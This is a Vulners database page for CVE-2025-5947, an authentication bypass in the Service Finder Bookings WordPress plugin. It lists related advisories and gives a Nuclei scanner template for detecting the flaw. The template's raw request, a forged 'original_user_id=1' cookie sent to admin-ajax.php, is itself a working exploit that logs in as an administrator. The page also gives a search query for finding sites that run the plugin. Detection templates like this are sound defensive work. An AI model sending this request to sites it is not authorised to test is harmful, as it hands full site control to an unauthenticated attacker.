| Reporter | Title | Published | Views | Family All 20 |
|---|---|---|---|---|
| Exploit for CVE-2025-5947 | 30 May 202606:57 | – | githubexploit | |
| Exploit for CVE-2025-5947 | 15 Oct 202512:34 | – | githubexploit | |
| The vulnerability of the service_finder_switch_back() function in the Service Finder Bookings plugin of the WordPress content management system allows a hacker to gain unauthorized access to protected information. | 1 Nov 202500:00 | – | bdu_fstec | |
| CVE-2025-5947 | 1 Aug 202504:31 | – | circl | |
| WordPress plugin Service Finder Bookings 安全漏洞 | 1 Aug 202500:00 | – | cnnvd | |
| WordPress Service Finder Bookings plugin elevation of privilege vulnerability | 10 Aug 202500:00 | – | cnvd | |
| CVE-2025-5947 | 1 Aug 202503:24 | – | cve | |
| CVE-2025-5947 Service Finder Bookings <= 6.0 - Authentication Bypass via User Switch Cookie | 1 Aug 202503:24 | – | cvelist | |
| EUVD-2025-23319 | 3 Oct 202520:07 | – | euvd | |
| Auth Bypass Flaw in Service Finder WordPress Plugin Under Active Exploit | 10 Oct 202516:12 | – | hackread |
id: CVE-2025-5947
info:
name: Service Finder Bookings - Authentication Bypass
author: sedat4ras
severity: critical
description: |
Service Finder Bookings WordPress plugin <= 6.0 contains a privilege escalation caused by improper validation of user cookie in service_finder_switch_back() function, letting unauthenticated attackers login as any user including admins.
impact: |
Unauthenticated attackers can login as any user, including administrators, leading to full system compromise.
remediation: |
Update to the latest version beyond 6.0.
reference:
- https://patchstack.com/database/wordpress/plugin/sf-booking/vulnerability/wordpress-service-finder-bookings-plugin-6-0-authentication-bypass-via-user-switch-cookie-vulnerability
- https://github.com/advisories/GHSA-x2xx-4qhp-2vqx
- https://github.com/M4rgs/CVE-2025-5947_Exploit
- https://nvd.nist.gov/vuln/detail/CVE-2025-5947
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2025-5947
epss-score: 0.04469
epss-percentile: 0.90294
cwe-id: CWE-639
metadata:
max-request: 2
vendor: sf-booking
product: service-finder-bookings
publicwww-query: "/wp-content/plugins/sf-booking/"
tags: cve,cve2025,wordpress,wp-plugin,wp,sf-booking,auth-bypass,cookie-spoofing,vuln,vkev
http:
- raw:
- |
GET /wp-admin/admin-ajax.php?action=service_finder_switch_back HTTP/1.1
Host: {{Hostname}}
Cookie: original_user_id=1
matchers-condition: and
matchers:
- type: regex
part: header
regex:
- '(?i)Location:.*\/wp-admin\/'
- type: regex
part: header
regex:
- '(?i)Set-Cookie:.*wordpress_logged_in_'
- type: status
status:
- 301
- 302
# digest: 4a0a00473045022008c6e89bf85ddaa201684c8a3ce19d70d1c2fd813c2befcc99a2b98565c54f2f022100b1829245ee77f69ed28df4cfa99409013145382ece8cf0d5bc8644fec4c0e895:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation